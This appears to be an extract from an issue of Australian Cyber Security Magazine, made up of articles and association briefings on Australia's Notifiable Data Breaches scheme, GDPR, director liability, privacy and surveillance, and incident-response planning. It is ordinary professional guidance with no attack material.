What if you are a Hiring Manager looking for a Rock Star Tester? Particularly with penetration testers, stop hiring people because they are a certified anything, have a computer security degree or MSc in software engineering. Hire them by testing their capabilities on the tools, their oral and written skills and asking them about their hobbies. If they spend 25 hours a day living and breathing penetration testing, it’s a good sign. This is a career that demands passion, obsession and it’s a hobby for them all: the fact they get paid bazillions is to a degree, unimportant to them as individuals. The UK recognised this a few years back and created, and in collaboration with Government, industry and academia, the Cyber Security Challenge was born; a scheme I wish could be emulated here, because it identifies raw talent, irrespective of education and background – rather than limited to university students. The last word on this is that if you really need to hire a penetration tester but don’t have the capability to assess them, hire a tester to check them out.
Australian Cyber Security Magazine | 43
Cover Feature Cyber Security
Now what? I have to notify the OAIC? A seven-step plan to keep OAIC at bay.
I By David Stafford-Gaffney
t is Monday 19th March and the day started like any other. On your way to the office, you stop at your regular café to grab your coffee, the barista looks at you and says, “large cappuccino?”, you nod, already tasting the coffee in the air, and as you ponder the day ahead, you take a brief moment to peruse the morning’s newspaper. Tucked away on the middle pages, a competitor’s name in the headline catches your eye. It immediately has your attention, you quickly scan it and you are not sure what to make of it. A rye smirk begins to form, just before you completely grasp the reality of the situation. Your competitor has had personally identifiable information, from one of their databases, made open to the public. You repeat the sentence in your head, as the gravity of the breach begins to take hold. You read further, they have had to report to the OAIC. But, who is that? You have never heard of them. They are now required to demonstrate the reasonable steps they took to contain the breach and articulate the steps taken to protect the information in the first place. Your gut begins to turn with that uncomfortable knot, that tells you, you have lost control over an element of the business and time is of the essence. However, where would you even start? It’s time to find out more about this OAIC… As you have probably guessed, the competitor has suffered an eligible data breach under the recently sanctioned amendment to the Privacy Act called the Notifiable Data Breaches legislation. Essentially, organisations that qualify under this amendment, due to go live on February 22nd, are required to notify the affected individuals and the Office of the Australian Information Commissioner (OAIC) in the event of an eligible data breach. This does not apply
44 | Australian Cyber Security Magazine
to my organisation, I hear you say, we are too small. The troublesome aspect of this legislation is that the net has been cast wide, in terms of those required to report on a breach. Let us break it down. The legislation contains a few key points that we need to look at in more detail: •
What is the size or type of the organisation that needs to comply? o Any organisation that must currently comply with the Privacy Act where: - The business or not for profit organisation has annual turnover of more than $3 million. - Private sector health service providers. - Credit reporting bodies. - Credit providers. - Entities that trade in personal information. - Tax File Number (TFN) recipients.
•
What exactly is an eligible data breach? o A data breach is considered eligible where the unauthorised access of information is likely to result in serious harm to an affected individual. What happens next? o The organisation must contain or remediate the unauthorised access or the vulnerability that caused it and then notify the affected individuals and the OAIC.
•
That is a lot to take in and hopefully by now you have finished your coffee so we can devise a plan to help your
Cyber Security
organisation address this. When it comes to addressing this, there is no silver bullet. A holistic approach will be required and there are seven steps you can take to put your organisation in the best possible position, should an eligible breach occur. 1. Create or update your Privacy Policy - You will need to book some time with your lawyer to understand the organisations requirements with respect to the Privacy Act. The goal is to create, or if you already have one, update your privacy policy, that will be available to all stakeholders of the business. This provides the basis for which you collect and store information and declares to all. 2. Identify and classify your information - The next thing to do is to baseline your environment. You will need to understand where your information is, who has access to it and what controls are in place to protect it. Finally, rank the information in order of sensitivity. This does not have to be complex, use a simple high, medium, low, if unsure. Understand however, that this is not always the easiest activity to complete and there are professional service organisations that can offer assistance by doing assessments. Alternatively, there are tools that will help with information discovery and information management. The key is to understand the information assets of the organisation and document them. This will help when it comes to incident management (point 4). 3. Demonstrate steps taken to secure the organisation – This is about being able to demonstrate what you have done to prevent an attack and therefore a data breach. There are a number of ways this can be done. However, for the smaller organisations that fall into the categories above, the best place to start will be the Australian Signals Directorate’s (ASD) Essential Eight. This will provide the eight most effective controls for mitigating 80% of cyber threats. Not all the controls are easy to implement, however, there is a guide that offers a complexity rating for the implementation of the controls. There is also a maturity model (Figure 1) available. Simply run through the list with your internal team or service provider, mark what you have in place and the maturity and what you do not have in place. Build a strategic or tactical plan to implement the remaining controls. If costs are associated, raise a risk around the new legislation and the impact a breach will have on the organisation and list the mitigations for that risk, which will include items on your roadmap.
To view Essential Eight maturity rating for patching operating systems - CLICK HERE 4. Manage incidents in a repeatable and predictable manner – the legislation sets out to understand what you have done to contain the incident. This is about developing and documenting an Incident Response Plan. The key here is to make this as practical as possible. Basic steps include: a. Define roles and responsibilities with respect to managing an incident. Think about who will manage
b.
c. d.
e.
f. g.
h.
the team fixing things, who will communicate with the business, who will track everything that’s being performed, who will actually manage the incident. Define a set of categorisations of incidents, based on your information classification (step 2). Then define response times, update intervals, levels of urgency required, individuals that need to be notified and an escalation path. Categorise the current incident by giving it a priority rating. Include the process flows of activities, so that whoever is running with the incident has a guide as to how this should play out. Include a template for recording activities that can be emailed or printed and every action that is taken, can then be recorded. Include a meeting minutes template, so meetings and decisions made can be documented. Include a list of key contacts and go to town on this, well you probably do not need to include the barista’s information. However, include the locksmith, the plumber (in case of flooding from a burst tap), glass repairer, lawyer, executives, and anyone else you may need to call in the event of an emergency. Finally, and I cannot stress the importance of this enough; include a post-incident review template. Keep it simple, what happened? Why? How? Lessons Learned? Keep it objective and free from personal attack so you narrow it down to a process or technology where possible. You will reduce, dramatically, the likelihood of this incident occurring in the future.
"Breaches will happen, it is almost certain now. The key is taking a pragmatic approach, preparing as much as you can, and being able to demonstrate what you have done."
5. Know your breach reporting obligations – It is critical you know how to report a breach before it happens. Educate senior managers, and feel comfortable in your obligations. The best place to get information to help you with this is from the Office of the Australian Information Commissioner’s website. It is a good idea to look through and familiarise yourself with it, as it is a good resource. It can be found here:- https://www.oaic.gov.au/privacy-law/ privacy-act/notifiable-data-breaches-scheme 6. Review and improve – Set aside a recurring appointment for 4 hours or so and review this set of documents and artefacts quarterly. People change roles, technology is updated and new technology is introduced, internal processes change, the size of organisations change. Breaches will happen, it is almost certain now. The key is taking a pragmatic approach, preparing as much as you can, and being able to demonstrate what you have done. Interestingly, despite it being somewhat of a compliance exercise, your organisation will actually be less likely to be a victim of an attack as a result of this activity. The next time you get your large capp and sit down to read the paper and your organisation is smack bang in a headline, you will have been expecting it and have probably bought the paper shortly after your coffee, to show the executive how methodical the process has been, minus the uncomfortable knot in your gut!
Australian Cyber Security Magazine | 45
WHY DO INFORMATION-RELATED STANDARDS (SECURITY, PRIVACY, ASSETS, AND RECORDS) MATTER TO BOARDS? FAILURE TO MEET A STANDARD CAN LEAD TO LEGAL LIABILITY – HOW DOES THIS WORK?
The “reasonable man test” • Would a hypothetical, reasonable man in the shoes of the ‘accused’ have acted in the same way in the same circumstances?
Due diligence and due care play a part in determining legal liability. Directors can be legally charged with negligence and held accountable for any ramifications of that negligence.
Three factors that contribute to the determination of liability: 1. A legally recognised obligation; 2. Failure to conform to the required standard; and 3. Proximate causation resulting in injury, damage or loss.
What is due diligence and due care?
• Liability ensues if the accused person’s (director’s) actions fall short of the hypothetical, reasonable man.
Risk management Risk management involves accepting, rejecting, reducing and transferring risk. Risk management ‘solutions’ are invariably provided through accreditation with a standard or assisted by the partial adoption of a standard, which in simple terms have the effect of establishing what is reasonable under certain circumstances.
• Due diligence - the act of investigating and understanding the risks that the entity faces, including information-related risks.
Examples of relevant information - related standards
• Due care - the act of developing and implementing risk management ‘solutions’ that address the risks identif ied during the due diligence process.
• ISO/IEC 29100:2011 - Information technology - Security techniques - Privacy framework.
• ISO/IEC 27000 family - Information security management systems.
• ISO 15489-1:2016 - Information and documentation - Records management - Part 1: Concepts and principles.
Law, standards and the “reasonable man test” • Law – the entity (through its directors) must comply. • Risk – the entity (through its directors) may choose to comply or not to comply. • Negligence - the entity (through its directors) fails to meet a required standard of the ‘reasonable man test’.
• ISO 55001:2014 - Asset management - Management systems - Requirements (including information assets).
*There are hundreds of relevant International and Australian standards that can be relied upon and/or used for guidance.
DISCLAIMER This document is part of AISA’s Information Briefing series prepared by the Australian Information Security Association and has been designed to provide background information only. It is not designed to replace legal advice or a detailed review of the subject matter. This document should not be relied upon as a basis for making business decisions or as a substitute for professional advice (legal or other). To the extent permitted by law, the Australian Information Security Association excludes all liability for any loss or damage arising out of the use of the material in this document. Any links to third-party websites are provided for convenience only and do not represent endorsement, sponsorship or approval of those third parties. The opinions expressed do not necessarily represent the view of the Australian Information Security Association.
ABOUT US As a nationally recognised not-for-profit organisation, the Australian Information Security Association (AISA) champions the cyber security safety of the Australian public as well as businesses and governments. Established in 1999, AISA has become the recognised authority on information security in Australia.
For more information
MEMBER FOCUSED
t: (02) 8076 6012
w: aisa.org.au
e: info@aisa.org.au
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
PRIVACY AMENDMENT (NOTIFIABLE DATA BREACHES) ACT 2017 (AN AMENDMENT TO THE PRIVACY ACT 1988)
PII is regarded as high-value, high-sensitivity information ‘Privacy’, ‘data privacy’ or ‘personal identifiable information’ (PII) is information that identifies an individual, or has the potential to identify an individual. In Privacy Commissioner v Telstra Corporation Limited [2017] FCAFC 4 (19 January 2017), the Court confirmed that even if a single piece of information is not about the individual it may be about the individual, and be considered as PII when combined with other information. PII is regarded as high-value, high-sensitivity information. Under the law, PIIis required to be respected and protected. This, however, cannot be accomplished without information security.
Public and private sector organisations in Australia and elsewhere are obliged to comply with laws that regulate the collection, use, storage, disclosure and security of PII. In Australia, PII is primarily regulated by the Federal Privacy Act of 1988, (Privacy Act), an Act that has been amended numerous times over almost 30 years, most recently, by the Privacy Amendment (Notif iable Data Breaches) Act 2017 (NDB Act), which came into force on 22 February 2018. Under the latest amendment, it introduced a mandatory Notifiable Data Breach Scheme (NDB Scheme).
The objective of the NDB Scheme is to strengthen the protection of PII and improve transparency to ensure organisations respond to serious data breaches, support consumer and community confidence, and give individuals the opportunity to take steps to minimise the damage that can result from unauthorised use of their PII.
Who must comply with the NDB Scheme?
The same organisations that must comply with the Privacy Act, namely: • Australian, ACT and Norfolk Island public sector agencies; • Private sector organisations with an annual turnover over $3 million; • Health service providers; and • Some small businesses and non-government entities.
The NDB Act provides new definitions and concepts: • “at risk” from an eligible data breach; • “eligible data breach”; and • Notif ication of eligible data breaches where there is “interference with the privacy of an individual”.
An “Eligible Data Breach” (EDB) triggers the obligation to notify the Australian Privacy Commissioner and affected individuals in certain circumstances.
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
ME MBE R F O CUSE D
2 Data breach notification is mandatory in four situations - If: 1. An APP entity holds personal information, and must comply with the APPs and take reasonable steps to protect the personal information from misuse, interference and loss, and from unauthorised access, modif ication or disclosure; OR 2. A credit reporting body holds credit reporting information and must secure the information; OR 3. A credit provider holds credit eligibility information and must secure the information; OR 4. A tax file recipient holds tax file number information and must secure the information;
AND, if there is unauthorised access or unauthorised disclosure; AND, a reasonable person would conclude that this is likely to result in the serious harm to any individual to whom the information relates; OR, if the PII is lost and the loss will lead to unauthorised access or disclosure, and then to serious harm or puts at risks the individual; THEN, the access or disclosure is an EDB and a breach must be notified.
Remedial action - If the entity takes action: • Before access, disclosure or loss results in serious harm; and • As a result, a reasonable person would conclude that serious harm would not result to the individuals concerned;
THEN, the entity is not required to notify.
Exceptions - There are various exceptions to the obligation to notify a breach. These include where the applicable entity is required to notify under the My Health Records Act 2012, and for reasons involving NDB of other entities, law enforcement, secrecy, and where the Privacy Commissioner makes a declaration not to notify.
MEMBER FOCUSED
Serious harm - Under the NDB Scheme, serious harm
will be assessed according to the kinds of information involved, it’s sensitivity, whether it was protected (including by encryption and access controls), and the kinds of persons who have obtained the information. The objective test will apply to assess reasonableness, meaning that what is reasonable is a question of fact in each individual case.
Suspected EDBs and the requirement to undertake and Assess - If an entity is aware that there are reasonable
grounds to suspect an EDB, but not aware there are grounds to believe it, the entity must carry out a reasonable and expeditious assessment, and complete this assessment in 30 days.
Breach statement If an entity is aware there are reasonable grounds to believe there has been an EDB, it must, as soon as practicable after becoming aware of the EDB: • Prepare a statement; and • Give a copy of the statement to the Privacy Commissioner.
Statement contents - The statement must set out: • The identity and contact details of the entity; • A description of the EDB; • The kind or kinds of information concerned; and • Recommendations about the steps that individuals should take in response.
Who must be notified and when? - As soon as practical after the statement is prepared, the entity must:
• Use the usual means of communicating with individuals; • Notify each individual to whom the information relates: or • Each of the individuals who are at risk; or if this is not possible: • Publish the statement on the entity’s website; and • Take reasonable steps to publicise the contents of the statement.
The Privacy Commissioner – May direct an entity to notify EDB, and may by written notice direct the entity to take any of the actions mentioned above.
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
3 Commissioner Powers - The sanctions for
non-compliance with the NDB scheme are the same sanctions as those that apply under the Privacy Act. The Commissioner has powers to investigate, make determinations, and provide remedies.
Australia in relation to the EU and the US –
There are three major influences arising from:
• The Judgment of the Court of Justice of the European Union in Schrems vs. Data Protection Commissioner on 6 October 2015 where the Court ruled that the “Safe Harbor Decision” on data transfers to the US was invalid, and the subsequent introduction of the “Privacy Shield”;
Sanctions - Include civil penalties for serious or repeated interferences with privacy, and penalties up to $420,000 for individuals and $2.1 million for organisations.
• The adoption of the European Union General Data Protection Regulation (GDPR) in April 2016, which supersedes Directive 95/46 adopted in 1995, which has been the basis of the data protection laws of the 30 European Economic Area Member States; and
What must be done to comply? Applicable entities
must implement:
• The Australian NDB.
• Practices; • Procedures; and • Systems, that:
Relate to their functions or activities and will: • Ensure that compliance with the 13 Australian Privacy Principles (APPs) and registered APP code (if any); • Enable inquiries or complaints from individuals to be addressed; and • Enable data breach reporting.
The Privacy Shield is already in operation between the EU and the US, where it is supported by the US Government. However, there is no such arrangement in Australia, and therefor Australian entities need to rely on other arrangements. The GDPR will become applicable on 25 May 2018, just three months after the NDB Scheme in Australia.
Australian businesses and GDPR – Australian
businesses will need to comply with the Privacy Act (which includes NDB) and GDPR where they: • Have an establishment in the EU; • Offer goods and services in the EU; or • Monitor the behaviour of individuals in the EU.
DISCLAIMER This document is part of AISA’s Information Briefing series prepared by the Australian Information Security Association and has been designed to provide background information only. It is not designed to replace legal advice or a detailed review of the subject matter. This document should not be relied upon as a basis for making business decisions or as a substitute for professional advice (legal or other). To the extent permitted by law, the Australian Information Security Association excludes all liability for any loss or damage arising out of the use of the material in this document. Any links to third-party websites are provided for convenience only and do not represent endorsement, sponsorship or approval of those third parties. The opinions expressed do not necessarily represent the view of the Australian Information Security Association.
ABOUT US As a nationally recognised not-for-profit organisation, the Australian Information Security Association (AISA) champions the cyber security safety of the Australian public as well as businesses and governments. Established in 1999, AISA has become the recognised authority on information security in Australia.
For more information
t: (02) 8076 6012
w: aisa.org.au
e: info@aisa.org.au
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
ME MBE R F O CUSE D
PRIVACY AND SURVEILLANCE, INCLUDING DATA LOSS PREVENTION, COOKIES AND WEB BEACONS BROADER CONTEXT FOR DIRECTORS
The issue: • The general rule is that telecommunications, data, and other laws prohibit surveillance and monitoring. (exceptions exist and sanctions apply). • Surveillance and monitoring limit or interfere with privacy (and data/personal information protection). • It is necessary to understand surveillance technologies in order to comply with privacy law. • Relevant technologies include data surveillance devices, listening devices, optical surveillance devices, tracking devices, geo-location devices etc. • Surveillance and monitoring is necessary for security in both private and public sector organisations. • Compliance and risk management involve competing rights/expectations. • Director duties of due diligence and due care apply.
Data loss prevention (DLP) is a strategy that
makes sure users do not send sensitive or critical information outside the corporate network. Business rules are applied to DLP software to classify and protect confidential and critical information (including Personal Information, “PI”) so that accidental or malicious distribution of internal information does not put the organisation at risk.
Surveillance – The deployment of DLP involves the
surveillance and monitoring of internal (and external) users through various logical means, including telecommunications and data surveillance.
MEMBER FOCUSED
Surveillance impacts directly upon privacy, the Privacy Act 1988, and the Notifiable Data Breach obligations, which came into force on 22 February 2018.
Cookies are text files (state information, technology
aware) supplied by a web server to a browser in response for a requested resource that the browser stores temporarily and returns to the server on any subsequent visits. Two kinds of cookies are commonly employed: session-based cookies, which last while a user’s browser is open and are automatically deleted when the browser is closed; and persistent cookies, which last until a user or a browser deletes them, or until they expire.
Web beacons, adTech and tracking objects – a web
beacon is a tiny image (object file, also called a tracking bug, tag, tracking pixel, or JavaScript tag). Unlike cookies, which can be accepted or declined by a user, a web beacon arrives as a GIF or other file object. Web beacons are placed on a user’s computer (or email) to track activity, creating a detailed profile of the user’s behaviour, enabling others to use, access and manipulate (read and write) a user’s accessible files, and collect the: • IP address of the computer that fetched the beacon; • URL of the page where the beacon is located; • The URL of the web beacon; • Time the web beacon was viewed; • Type of browser that fetched the beacon; and • A previously set cookie value.
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
INNO VATE
HOW ARE YOU MANAGING YOUR CYBER RISK?
INNO VATE
Attend the most comprehensive cyber conference in Australia!
Participate in business tracks free of technical language, hear from international thought leaders in cyber and engage in workshops and training to equip you with a better understanding of how you can manage this risk.
Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today
ME MBE R F O CUSE D
Cyber Security - Sponsored by Micro Focus
Executive Editor ’s Interview
....with David Kemp Executive Editor’s interview (Extract) with David Kemp, Specialist Business Consultant with Micro Focus agency, and that you are avoiding the reputational damage if you get it wrong, along with any relevant fines. Here in Australia, the fine is $2.3 million compared to GDPR, which imposes a penalty of up to 4 per cent of your global revenue or 20 million euros, whichever is higher. 2. Secondly, we can look at client audit. If you had to encapsulate these issues in relation to privacy in one word, it would be “trust”. Can I trust a product provider or service provider, bank, insurer, or even a transportation company, with my information? Many retail consumers are asking, are you GDPR effective? In Australia, the same question is being asked: are you compliant with Australian privacy laws? If not, you don’t get their business. This is a day-to-day occurrence, compared to a fine or a regulatory hit, which might impact only a few entities.
By Chris Cubbage EXECUTIVE EDITOR
View & Listen
There are two fundamental aspects to the GDPR:
General Data Protection Regulation: Insights into the fundamentals, ramifications & opportunities: The European Union’s General Data Protection Regulation comes into effect on 25th May. In March, David Kemp, Specialist Business Consultant with Micro Focus was in Australia to examine the Australian market against three key propositions: 1. To what extent does GDPR impact Australian entities handling the personal data of EU residents? 2. Are the lessons learned over the last two years, relating to GDPR in the United Kingdom, lessons that can be carried across to the Australian market and what is their relationship to the Australian Privacy Act 1988 and subsequent amendments. 3. GDPR is a catalyst for addressing bigger issues, both in relation to security and data lifecycle management – like yin and yang, they are inseparable, in terms of ensuring data privacy. So, we want to see what else Micro Focus can do for the Australian market. In explaining the business benefits of adopting the GDPR Compliance framework, David highlights, “There are several major benefits that we have found in Europe, which we are validating here in Asia. 1. First, the pure compliance piece, making sure you are being a good citizen as a corporate or government
52 | Australian Cyber Security Magazine
1. The data type – people think this is just about dealing with emails or Word documents. However, it is any data: audio, visual, alphanumeric, and social media data. I was looking at an advert for the OCBC Bank in Singapore last week and they have a capability called voice banking. Both voice and facial recognition data types are also PII. So, Pandora’s box is already open; when I press the button in Europe and say I want to be forgotten in 28 days, you are going to have to find all of it. That’s just one axis. 2. The second axis is very important and it’s about location of data. Regulators seem to think that it’s about where your laptop is or where your Exchange server is hosted, but it’s not just that. It’s all endpoint devices. I was talking to the senior IT architect of a global bank and he said, “the mobile phone is our prime means of communication with our retail customers.” I think most people know that anyway, especially millennials, so from that point of view, where is the data? It could be an endpoint device, a mobile phone, a laptop, stored in a PC, or even a records management system, in an archive, in a backup or stored as hard copy in Iron Mountain. When I press the button to be forgotten with my bank, they need to look in every one of those silos, which is incredibly difficult. These are the two fundamental challenges that lie behind the ability to provide security and data lifecycle management.
Regulation & Enforcement Will the regulators in Europe have the manpower and scope to enforce these laws? In David’s view, “They have the power, but this an important point: do they have the resources? I come from a banking background, with over 19
Cyber Security
years’ experience, and I have found that regulators rarely have the capability to pursue and audit everyone. But they can carry out selective audits, and they are already warning organisations and government departments in Britain and Ireland that they will be audited by the 25th May. Regulators teach by example. The other issue is to what extent are regulators being helpful? The regulations are rather broad. One of the mantras we have as Micro Focus is, you need a legal opinion internal or external, to translate regulations into business functionalities – both in relation to security and data lifecycle management. Only then can you achieve a level of confidence; of course, it’s not always technology, since people, process, policy and procedures are important, but technology also has a role to play. The real question for people is, to what extent is your technology capable? Articles 34/3 and 30 of GDPR, talk about appropriate technical measures being taken to reduce exposure. If you have done that, you are providing yourself with remediation and exemption. But, to come back to answering the question, the regulators will do things by example – so the real question that should be asked is, “To what extent are regulators in Europe helping people?” I would say that in Ireland and the United Kingdom the regulators are particularly helpful, you look at their websites, they have guidance, checklists and recommendations on what you should do. There has been other instances in the Nordic region were the regulators are simply just waiting to see what happens. Who will enforce it? The point is that you cannot afford to wait, and you can’t afford to second guess it.
Opportunities: Redundant, Duplicate, Obsolete, or Trivial Many corporations in Europe don’t look at over 30 per cent of their data, they don’t even know where it is or what is in it. It could be what we call ‘RDOT’ - redundant, duplicate, obsolete, or trivial, and someone thought they would load up Game of Thrones on a hard drive, for everybody’s enjoyment. If you take this away, what are you doing? The possibility of proper data analytics. Operational efficiency is an important point. Therefore, what the CIO’s have been doing is they are shrinking the data, they are reducing the size of the haystack, to make it easier to find the needle and that fits in with the bigger, longer-term strategies, of application retirement. At the same time, they are reducing the cost of their backup and recovery. We are talking ROI, which may sound strange in terms of compliance. The third axis is revenue. How can I make money out of GDPR or the privacy regulations? It comes back to ‘trust’ and brand loyalty. I will stay with you, providing that I can still trust you; I will come and join you as a provider of products and services, provided you are compliant. It improves my data mining. I was talking to a CIO of a large Asia Pacific bank recently, who said ‘I want to improve the ability of my high net worth managers and also my retail customer managers, to create new products and services to do that you need to mine the information, but the question is, ‘how can you mine it in an appropriate way?’ That is really where encryption
comes in. To a certain extent, they don’t need to know me down to my exact street, they don’t even need to know my precise age, but simply the decade in which I lived. So, the idea of being able to access this information in a compliant way, we are talking about creating ‘new money’ and ‘new capabilities’. Let me just give you one more example. There is a large Japanese corporation that makes Sat-Nav devices. I changed car recently and said to the car dealer, ‘My Sat-Nav tells you quite a lot about where I live, who my friends are, where my family is and whatever. I want that scrubbed.’ What this Japanese corporation is planning to do is not only sell the Sat-Nav to Volkswagen but offer to bring back the data out of my Sat-Nav, cleanse it, encrypt it and send it back so they can use it for marketing purposes, but now it’s cleansed. What have they done? They have created a new revenue stream. Very clever.
Privacy By Design
'Under GDPR, within 28 days you must find my data in any format anywhere in your enterprise and you must delete it and produce an
Under GDPR, within 28 days you must find my data in any format anywhere in your enterprise and you must delete it and produce an audit trail to prove you have done it. The judges don’t understand the algorithms, but they can see the output. So, you need to prove you have achieved this. When you think of investigations such as with WikiLeaks, the Panama Papers, or the Paradise Papers, this is becoming a much more high-profile issue. I don’t believe that on the 26th May that in Europe there is going to be calamitous class actions, but it is possible. Furthermore, I don’t think you need a class action suit to fundamentally wreck the reputation of the business that lost all its customers’ data. You just need social media, and customers saying, ‘have you seen the same thing as I have?’ The final point to highlight is privacy by design: the concept that, from here on in, every time you create a new product or service, privacy is baked in. That means you are taking positive action in terms of analysis to anonymise or protect data, making this a fundamental part of business. Personally, I think this will change the corporate view, because you don’t have a choice. Micro Focus is a UK-based software company and is the largest tech stock on the UK stock exchange. Micro Focus merged last year with Hewlett Packard’s software division, creating the 7th largest software company in the world, with a market capital of close to $13 billion dollars and a revenue of $4.4 billion dollars. Visit www.microfocus.com
audit trail to prove you have done it'
VIEW - VIDEO: https://australiancybersecuritymagazine.com.au/ david-kemp-of-micro-focus-provides-an-in-depthexplanation-into-the-gdpr/
LISTEN – PODCAST: https://australiancybersecuritymagazine.com. au/episode-48-implications-opportunities-ofthe-european-unions-gdpr-and-australias-ndbscheme/
Australian Cyber Security Magazine | 53
Cyber Security
Breach notification isn’t just about breach notification
M By Samantha Humphries
andatory breach notification is fast becoming a requirement all over the world. Whether you need to comply with GDPR on a global level, with NDB more locally in Australia, or another regulation that’s relative to your vertical, it’s becoming more common place. And, frankly, it’s about time. Data has long had a monetary value attached to it, whether it be personal data, financial data, proprietary data, or state secrets. Stolen login credentials can trade hands on the dark web for a mere handful of cents, and with password reuse an all too common occurrence, it’s not complicated for an attacker to gain access to a whole lot more information, with a small amount of effort. I’m not going to go into lecture mode about password hygiene right now. As security professionals, we all know the drill, so we understand it’s on us to both educate and protect the users as best we can. I do want to share a story with you about a person I met last year, who had been through the nightmare that is identity theft. This person is certainly not counting the pennies in their bank account; their credit rating was incredible; yet they now have to
54 | Australian Cyber Security Magazine
prove that they are really, really, really them every time they speak to financial or service providers, and their once awesome credit rating is most definitely in repair mode. The ‘other them’ took out loans, credit cards, store cards in their name, changed their address multiple times, and took out utility contracts in order to get ‘proof’ of address. To get this resolved is still taking up a lot of their time, and there is no one throat to choke, when it comes to getting assistance. This story, which is by no means an isolated event, goes to show how leaked personal data can have a massive impact on someone’s life. So as a person who shares my data with organisations, I am very pleased to see that regulatory compliance is putting the onus on both protecting my data and letting me know if it’s fallen into the wrong hands. Breach notification, whilst not something that is “fun”, is just one part of the incident response puzzle. The act of sending an email to customers or updating some code on a webserver is something that happens regularly, but getting the message right is critical. Crafting the message in a way that resonates with your customers isn’t something that
Cyber Security
organisations always do well. To be the bearer of bad news, but in a manner, that reassures people that you are doing everything you can to deal with the situation, it takes a certain level of skill and decorum. Maersk is a good example of getting this right. During its outage caused by the Not-Petya attack, they were updating customers regularly through their website and social media, and said that their managers were empowered to help customers. They were transparent, and put the customer front and centre, whilst dealing with the impact of incident. Let’s rewind somewhat though, as crisis communications is still a smaller, albeit vital, part of the bigger picture. It all starts with incident detection and response. There has never been a more important time to be able to detect, investigate, and respond to attacks quickly and effectively. In security and IT, we often talk about three pillars: people, process, and technology - and all three are equally important when it comes to incident detection and response. All of us are well versed in the benefits of having solid defences in our networks and extended ecosystems, yet we see that attackers still get through. That’s not to say that we should give up on defending, and take up landscape gardening instead, but we do need to be prepared for the worst happening. Your organisation likely has an incident response plan, probably documented somewhere, and hopefully printed out onto actual paper too. If it only resides on an internal website, please do print it out, as otherwise, it’s all together possible that when you need it most you won’t be able to access it. So, now that the printer is chirping away, think about when you last reviewed that plan. Threats and attacks change, as do the motivations behind them, so your plan needs to be reviewed regularly to ensure it’s relevant. Does it contain names and phone numbers of people to contact, or functional teams and multiple contact methods? Is there a single generic plan for all incident types, or a playbook covering a multitude of options depending on the issue at hand? In both cases, the latter option is what you should be aiming for. Threat modelling will help you tailor your plan to your specific organisation’s needs. If you are a small company, and believe it’s unlikely an attacker will want to go after your data, think again. For example, a ransomware attack could be at best costly, and at worst leave you unable to do any business at all for days, possibly to the point of being terminal. If you’re part of a larger supply chain, you are a prime asset on the way to the larger mission target too. An attack on Swisscom in 2017, resulting in the exposure of 800,000 customers’ records, was reported as originating from a sales partner. It is also a Good Thing ™ to put your playbook through its paces on a regular basis. I’ve spent a lot of my years helping organisations recover from outbreaks and attacks, and every single time it was documented that the IR processes needed to be dry run periodically. More often than not, this did not happen, until the next event, and the same hollow promises were repeated. Take the time to test out your plans, as this will help you find the gaps. This doesn’t mean you should be riddling your network with
malware to see how you get on, there are various different types of fire drills you can perform: penetration tests, threat simulations (aka table top exercises), purple teaming (where red and blue teams go up against each other), and indeed checking your phone tree and alternate communications methods work correctly. Your processes should be watertight; otherwise, your people will be struggling from the outset. This segues nicely into the People part. Clear roles and responsibilities during an incident will help things run much more smoothly. Single points of failure are bad – the person you need for xyz thing will undoubtedly be sunning themselves in the Maldives when you need them most. Make sure too that you know who to contact at your vendors, as you may well need them to join in your response efforts. It may be that you are at an organisation with a well-staffed security operations centre, with a team of decorated incident responders, who can handle this stuff in their sleep, except they don’t even need sleep because they are super beings who may or may not pass the VoightKampff test. However, this isn’t a luxury that all organisations have, and as we well know, hiring and retaining these types of people is not the easiest. If this is the case for you, it’s worth investigating managed services options, as this will provide you with the eyes, ears, and mind-set that will help you detect and respond to incidents. Technology is by no means the last thing on the list – ideally, you need to be able to spot potential issues early, whether that’s someone starting to roam around your network using stolen or compromised user credentials, or some as yet unidentified malware spawning a process on an endpoint. Think about whether your current security stack has the capabilities to do this. Additionally, deception technologies, which are essentially trip wires, can set off alarm bells allowing you to investigate and respond before it’s too late. Fast detection and containment, combined with a good prevention security strategy, can make the difference between needing or not needing to send that email, or putting a message up on your website. Nobody wants to be in the position where they need to tell their customers that their data has disappeared off into the realms of Breachedland, or that they are unable to provide a service because all your systems are displaying ransomware messages. Breach notification is not just about a message, it’s about good preparation, regular review, and having the rights tools and people at your disposition. And printers, they really are your friend.
Breach notification is not just about a message, it’s about good preparation, regular review, and having the rights tools and people at your disposition. And printers, they really are your friend.
About the Author Jill of many trades, mistress of a few. Samantha has spent most her working life entrenched in the world of cyber security. As you can imagine, she loves it. Her career has spanned many areas of the business - sales, technical support, solutions marketing, channel support, outbreak management and incident response, engineering and researcher management, product management, and more. She likes solving problems and making customers happy. She fully believes that it’s wonderful to be able to do what you love.
Australian Cyber Security Magazine | 55
Cyber Security
Everything you need to know about breach notifications
W by Mark Jones
hen the board approaches you for guidance on how changing legal requirements could impact the organisation, how prepared are you? As cyber professionals, it seems the goal posts are constantly moving, be it a new legal requirement, everexpanding information sets, contractual relationships, adoption of cloud services, and of course the everevolving threat. It’s very clear talking with our Global Threat Intelligence Centre that our adversaries are innovating and outpacing organisations response, so we have to get smarter in our approach. In my last article, in Issue 2, I wrote largely of that evolving threat landscape, challenges in keeping up with the bad guys, and how to identify the good as well as the bad, to close the gap. Given the changes to breach notification that is particularly pertinent, however, first I’ll take a few steps back and look at what we do and why.
The Why, What’s and How’s At a high-level three things direct a business, management of opportunity and risk, strategy, and the stuff we have to do [aka compliance]. These three things dictate the people, process and tools being used by an organisation, the
56 | Australian Cyber Security Magazine
information and resources required to achieve an outcome, and hopefully, how we measure and report to make sure it’s all working properly. Sounds easy, right? So, why point it out? Whilst we should ideally understand the above, we don’t always know our personnel, their relationships outside of work, or even in work, what they do day to day, or indeed what tools they use. How many of you have done an assessment of business process, application, contracts and services, not to mention information flow? Most organisations know the big stuff, so that big database with all their customer details in, but have you considered telematics, industry data, that random IoT device or any number of other things?
